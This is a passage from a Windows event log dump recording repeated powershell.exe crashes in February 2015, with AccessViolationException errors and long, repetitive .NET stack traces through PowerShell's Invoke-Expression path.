   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:40:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x039292b8
Faulting process id: 0x6e0
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:40:24 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:38:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x03048ce8
Faulting process id: 0x1378
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:38:00 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
 
Error: (02/21/2015 10:37:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x035092a0
Faulting process id: 0xf3c
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:37:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
